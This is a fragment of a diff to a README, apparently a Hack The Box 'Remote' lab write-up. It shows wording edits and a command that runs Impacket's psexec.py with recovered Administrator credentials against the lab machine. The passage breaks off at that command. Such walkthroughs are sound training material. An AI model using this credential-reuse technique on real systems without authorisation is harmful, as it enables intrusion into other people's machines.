vipertooth/HTB-Remote/Readme.md

 [*] Post module execution completed
 ```

-Now that we have new creds it is best to test them with psexec.
+Now that I have new creds it is best to test them with psexec.
 Impacket is a collection of tools that can be used against windows systems.
-Located at `/usr/share/doc/python3-impacket/examples`
+Located at `/usr/share/doc/python3-impacket/examples` it has a linux version of psexec.

 ```bash
 root@HTBKali:/usr/share/doc/python3-impacket/examples# ./psexec.py Administrator:\!R3m0te\!@10.10.10.180